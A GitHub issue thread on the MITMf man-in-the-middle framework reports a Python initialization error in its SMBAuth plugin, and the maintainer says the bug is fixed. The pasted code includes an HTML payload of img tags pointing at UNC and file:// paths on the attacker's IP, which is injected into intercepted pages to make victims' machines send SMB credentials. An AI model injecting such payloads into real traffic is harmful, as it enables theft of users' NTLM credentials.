### ISSUE TITLE
SMB Auth Plugin

### ISSUE THREAD

**Issue by bandwagonz** [byt3bl33d3r/MITMf#126]
Using the --smbauth flag was producing this error.

|_ SMBAuth v0.1
Traceback (most recent call last):
  File "./mitmf.py", line 136, in <module>
    p.initialize(args)
  File "/opt/MITMf/plugins/SMBAuth.py", line 35, in initialize
    Inject.initialize(options)
TypeError: unbound method initialize() must be called with Inject instance as first argument (got Namespace instance instead)

Took a quick look at the code and swapped these two: 

    def _get_data(self):
        return '<img src=\"\\\\%s\\image.jpg\">'\
                '<img src=\"file://///%s\\image.jpg\">'\
                '<img src=\"moz-icon:file:///%%5c/%s\\image.jpg\">' % tuple([self.target_ip]*3)

        Inject.initialize(options)
        self.html_payload = self._get_data()

Hopefully i can figure out how to make the changes on github (total noob), but if i don't at least the error's logged.

**Comment by byt3bl33d3r** [comment]
@bandwagonz thanks for reporting this! should be fixed now :+1:
